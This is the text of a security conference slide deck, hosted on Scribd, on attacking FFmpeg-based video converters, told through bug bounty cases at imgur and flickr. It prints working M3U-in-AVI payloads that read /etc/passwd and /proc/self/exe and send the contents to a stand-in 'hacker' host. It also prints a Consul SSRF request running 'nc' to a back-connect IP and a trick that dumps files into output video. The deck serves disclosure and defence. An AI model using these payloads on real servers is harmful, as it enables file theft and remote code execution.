Scribd
Upload
38 views66 pages

Phdays Ffmpeg

Uploaded by

Leban Bo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
38 views66 pages

Phdays Ffmpeg

Uploaded by

Leban Bo
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 66

Attacks on

video converters:
a year later
Emil Lerner
Pavel Cheremushkin
Who we are?
Emil Lerner Pavel Cheremushkin

● MSU CMC postgraduate ● MSU CMC graduated bachelor ?


● Bushwhackers CTF team ● Bushwhackers CTF team
● uses emacs as IDE ● @__paulch on twitter
● uses vim as IDE
How a videoservice works

FFmpeg
Attack model

FFmpeg
(on target server)
Previous work

- Maxim Andreev, Mail.Ru Meetup 2016


- “Viral Video” by Maxim Andreev &
Nikolay Ermiskin, BlackHat USA 2016
M3U playlists

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://internal.host/api/method
#EXT-X-ENDLIST
“Viral Video”, BH USA 2016
M3U playlists: reading responses and files
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1 prefix.m3u:
#EXTINF:1.0,
http://hacker/prefix.m3u
#EXTM3U
#EXTINF:1.0,
#EXT-X-MEDIA-SEQUENCE:1
file:///etc/passwd
#EXTINF:1.0,
#EXT-X-ENDLIST
http://hacker/read?

“Viral Video”, BH USA 2016


Segments concatenated:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

“Viral Video”, BH USA 2016


Fixes

● proto limited to http:// and file://


● same protocol for segments and playlist
● nesting limited
Format validation
AVI GAB2 chunk: subtitles
AVI GAB2 chunk: not only subtitles
Format validation: bypass
file_for_upload.avi:

<AVI header+GAB2 header> prefix.avi:


#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1 <AVI header+GAB2 header>
#EXTINF:1.0, #EXTM3U
http://hacker/prefix.avi #EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0, #EXTINF:1.0,
<interesting url> http://hacker/read?
#EXTINF:1.0,
http://hacker/footer.avi
#EXT-X-ENDLIST
<AVI fake body + footer>
segments concatenated:

<AVI header+GAB2 header>


#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
http://hacker/read?<interesting data line 1>
<interesing data>
#EXT-X-ENDLIST
<AVI fake body + AVI footer>
Bug bounty story #1 (imgur.com)
Bug bounty story #1 (imgur.com)
Bug bounty story #1 (imgur.com)

● M3U and SSRF works

● response read (via M3U inside AVI) works too


Bug bounty story #1 (imgur.com)

● hosted on AWS
● AWS keys from metadata api didn’t work :(
● http://169.254.169.254/latest/user-data
mentions “Consul”
Bug bounty story #1 (imgur.com): Consul
Bug bounty story #1 (imgur.com): Consul
/v1/agent/self HTTP/1.1
Connection: Keep-Alive

PUT /v1/kv/_rexec/<CONSUL_SESSION_ID>/job HTTP/1.1


Content-Length: 86

{"Wait": 2000000000, "Command": "cat /etc/passwd | nc


<BACKCONNECT_IP> 31337"}PUT /v1/event/fire/_rexec HTTP/1.1
Content-Length: 71

{"Prefix": "_rexec", "Session": "<CONSUL_SESSION_ID>"}


Bug bounty story #1 (imgur.com): Consul
http://127.0.0.1:8500/v1/agent/self%20HTTP/1.1%0D%0AConnection%3A
%20Keep-Alive%0D%0A%0D%0APUT%20/v1/kv/_rexec/<CONSUL_SES
SION_ID>/job%20HTTP/1.1%0D%0AContent-Length%3A%2086%0D%0
A%0D%0A%7B%22Wait%22%3A%202000000000%2C%20%22Comma
nd%22%3A%20%22cat%20/etc/passwd%202%3E%261%20%7C%20nc
%20BACKCONNECT_IP%2031337%22%7DPUT%20/v1/event/fire/_rexe
c%20HTTP/1.1%0D%0AHost%3A%20consul%0D%0AContent-Length%3
A%2071%0D%0A%0D%0A%7B%22Prefix%22%3A%20%22_rexec%22
%2C%20%22Session%22%3A%20%22<CONSUL_SESSION_ID>%22%
7D
Bug bounty story #1 (imgur.com): RCE
Binary vuln. vs Logical vuln.
Fuzzing FFmpeg
● Google Research “FFmpeg and a thousand fixes” by
Mateusz Jurczyk and Gynvael Coldwind
● oss-fuzz by Google
● Open Broadcast Systems
● ...

$ git log | egrep -c 'Jurczyk|Coldwind'


1372
FFmpeg Workflow
FFmpeg Workflow
Fuzzing network code

● hook network functions (connect,


send/recv)
● known & popular approach
● tools exist (e.g. preeny)
Problems of RL remote exploitation
It’s easy because… It’s hard because…

● A lot of ROP gadgets ● No binary knowledge


● A lot of functions in @plt ● No system knowledge
● Choose your own (ASLR, libc version, etc.)
exploitation method! ● Can’t debug remote
exploit
● Command line params
● ...
HTTP Exploit (CVE-2016-10190)

function@plt(arg1, arg2, arg3);


RTMP Exploit (CVE-2016-10191)
RTMP Exploit (CVE-2016-10191)
RTMP Exploit (CVE-2016-10191)
Bug bounty story #2 (flickr.com)

● format validator bypassed via M3U AVI


● old FFmpeg version
● can read local files and fire SSRF requests
file_for_upload.avi:

<AVI header+GAB2 header> prefix.avi:


#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1 <AVI header+GAB2 header>
#EXTINF:1.0, #EXTM3U
http://hacker/prefix.avi #EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0, #EXTINF:1.0,
file:///proc/self/exe http://hacker/read?
#EXTINF:1.0,
http://hacker/footer.avi
#EXT-X-ENDLIST
<AVI fake body + footer>
file_for_upload.avi:

...
#EXTINF:1.0,
#EXT-X-BYTERANGE: <size>@<offset>
file:///proc/self/exe
...
file_for_upload.avi:

...
#EXTINF:1.0,
#EXT-X-BYTERANGE: <size>@<offset>
file:///proc/self/exe
...

can’t read 0x00, 0x0a, 0x0d


...
#EXTINF:1.0,
#EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key"
file:///proc/self/exe
...
...
#EXTINF:1.0,
#EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key"
file:///proc/self/exe
...

read approx. 5 full blocks


...
#EXTINF:1.0,
#EXT-X-BYTERANGE: 1000@<offset>
#EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key2"
file:///proc/self/exe
...
...
#EXTINF:1.0,
#EXT-X-BYTERANGE: 1000@<offset>
#EXT-X-KEY:METHOD=AES-128,URI="http://hacker/key2"
file:///proc/self/exe
...

read full data


Bug bounty story #2 (flickr.com)

1. dump /proc/self/exe
2. adjust ropchains
3. fire rtmp:// request
Bug bounty story #2 (flickr.com)
Cool, but what if there’s no network?
Dump files directly to the video!
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
data:<format-header>
#EXTINF:1.0,
file:///etc/passwd
#EXTINF:1.0,
data:<format-footer>
#EXT-X-ENDLIST
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:1
#EXTINF:1.0,
data:<format-header>
#EXTINF:1.0,
file:///etc/passwd
#EXTINF:1.0,
data:<format-footer>
#EXT-X-ENDLIST
...
#EXTINF:1,
#EXT-X-KEY:METHOD=AES-128, URI=/dev/zero
#EXT-X-BYTERANGE: 16
/dev/zero
...

= AES-10x00...00(0x00...00)
...
#EXTINF:1,
#EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL>
#EXT-X-BYTERANGE: 16
/dev/zero
...

= AES-10x00...00(0x00...00) ⊕<VAL>
...
#EXTINF:1,
#EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL>
#EXT-X-BYTERANGE: 16
/dev/zero
...

= AES-10x00...00(0x00...00) ⊕<VAL> = <FMT HEADER>


...
#EXTINF:1,
#EXT-X-KEY:METHOD=AES-128, URI=/dev/zero, IV=<VAL>
#EXT-X-BYTERANGE: 16
/dev/zero
...

= AES-10x00...00(0x00...00) ⊕<VAL> = <FMT HEADER>

CONST
XBIN format

● ancient
● can draw symbols
● header length ≤ 16 bytes
AVI
AVI

GAB2
AVI
GAB2

M3U
AVI
GAB2
M3U

XBIN (via AES)


AVI
GAB2
M3U
XBIN XBIN
header /etc/passwd footer
Bug bounty story #3 (Vk.com, tumblr, flickr again, …)
Bug bounty story #3: even Google!
Takeaways (for defender)

● FFmpeg must be sandboxed


○ there is no other way
○ don’t even ask

“FFmpeg is one of those projects we trust to have RCE


everywhere”

Google security team


Takeaways (for hacker)

● video processing = $$$


our bounties ~ 25k$

https://github.com/neex/ffmpeg-avi-m3u-xbin
Thank you!

You might also like